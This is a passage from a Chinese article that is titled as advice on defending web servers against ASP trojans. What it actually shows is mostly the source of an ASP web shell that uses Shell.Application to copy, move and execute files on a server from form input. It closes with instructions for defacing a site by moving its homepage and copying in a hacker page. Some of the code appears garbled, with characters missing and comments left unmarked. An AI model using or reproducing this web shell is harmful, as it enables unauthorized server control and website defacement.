Web服务器上防范基于ASP程序的木马

if mid(szcmd1,i,1)="" then

path=left(szcmd1,i-1)

exit for

end if

next

if len(path)=2 then path=path & ""

path2=right(szcmd1,len(szcmd1)-i)

set fod2=shell1.namespace(path)

set foditem=fod2.parsename(path2)

fod1.copyhere foditem

response.write "command completed success!"

end if

%＞ ＜%

szCMD3 = Request.Form("text3") 目录移动

szCMD4 = Request.Form("text4")

if szcmd3＜＞"" and szcmd4＜＞"" then

set shell2=server.createobject("shell.application") 建立shell对象

set fod1=shell2.namespace(szcmd4) for i=len(szcmd3) to 1 step -1

if mid(szcmd3,i,1)="" then

path=left(szcmd3,i-1)

exit for

end if

next

if len(path)=2 then path=path & ""

path2=right(szcmd3,len(szcmd3)-i)

set fod2=shell2.namespace(path)

set foditem=fod2.parsename(path2)

fod1.movehere foditem

response.write "command completed success!"

end if

%＞

＜%

szCMD5 = Request.Form("text5") 执行程序要指定路径

szCMD6 = Request.Form("text6")

if szcmd5＜＞"" and szcmd6＜＞"" then

set shell3=server.createobject("shell.application") 建立shell对象

shell3.namespace(szcmd5).items.item(szcmd6).invokeverb

response.write "command completed success!"

end if

%＞

要查看目录，只要输入相应的目录，点发送命令就可以了。这个木马程可以完成文件的COPY、MOVE，和执行程序。但很多命令都不能用，例如：del、net、netstat等。这个木马程的功能随然简单，但是用它来黑一个网站是足够了。比如，我们可以把网站的首页MOVE到其它地方，然后我们再COPY一个同名的黑客网页进去，就行了。